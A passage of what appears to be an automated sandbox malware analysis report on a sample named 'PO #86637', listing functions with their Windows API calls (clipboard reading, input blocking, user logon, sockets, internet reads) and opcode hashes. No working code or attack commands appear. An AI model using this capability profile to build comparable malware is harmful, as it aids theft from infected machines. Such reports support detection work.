                      • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorLastinet_addrsocket
                      • String ID:
                      • API String ID: 4170576061-0
                      • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                      • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                      • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                      • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                      Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                      • IsWindowVisible.USER32 ref: 0047A368
                      • IsWindowEnabled.USER32 ref: 0047A378
                      • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                      • IsIconic.USER32 ref: 0047A393
                      • IsZoomed.USER32 ref: 0047A3A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                      • String ID:
                      • API String ID: 292994002-0
                      • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                      • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                      • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                      • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                      Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                      • CoInitialize.OLE32(00000000), ref: 00478442
                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                      • CoUninitialize.OLE32 ref: 0047863C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                      • String ID: .lnk
                      • API String ID: 886957087-24824748
                      • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                      • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                      • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                      • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                      Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                      Download Yara Rule
                      APIs
                      • OpenClipboard.USER32(?), ref: 0046DCE7
                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                      • CloseClipboard.USER32 ref: 0046DD0D
                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                      • CloseClipboard.USER32 ref: 0046DD41
                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                      • CloseClipboard.USER32 ref: 0046DD99
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                      • String ID:
                      • API String ID: 15083398-0
                      • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                      • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                      • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                      • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                      Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: U$\
                      • API String ID: 4104443479-100911408
                      • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                      • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                      • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                      • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                      Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                      • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Find$File$CloseFirstNext
                      • String ID:
                      • API String ID: 3541575487-0
                      • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                      • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                      • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                      • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                      Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                      Download Yara Rule
                      APIs
                      • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                      • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                      • FindClose.KERNEL32(00000000), ref: 004339EB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: FileFind$AttributesCloseFirst
                      • String ID:
                      • API String ID: 48322524-0
                      • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                      • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                      • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                      • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                      Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                      Download Yara Rule
                      APIs
                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                      • String ID:
                      • API String ID: 901099227-0
                      • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                      • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                      • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                      • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                      Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                      Download Yara Rule
                      APIs
                      • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Proc
                      • String ID:
                      • API String ID: 2346855178-0
                      • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                      • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                      • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                      • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                      Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • BlockInput.USER32(00000001), ref: 0045A38B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: BlockInput
                      • String ID:
                      • API String ID: 3456056419-0
                      • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                      • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                      • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                      • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                      Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: LogonUser
                      • String ID:
                      • API String ID: 1244722697-0
                      • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                      • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                      • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                      • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                      Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                      Download Yara Rule
                      APIs
                      • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: NameUser
                      • String ID:
                      • API String ID: 2645101109-0
                      • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                      • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                      • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                      • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                      Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                      • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                      • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                      • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                      Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID: N@
                      • API String ID: 0-1509896676
                      • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                      • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                      • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                      • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                      Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                      • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                      • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                      • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                      Function 004129D0 Relevance: .4, Instructions: 355COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                      • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                      • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                      • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                      Function 004125E8 Relevance: .3, Instructions: 349COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
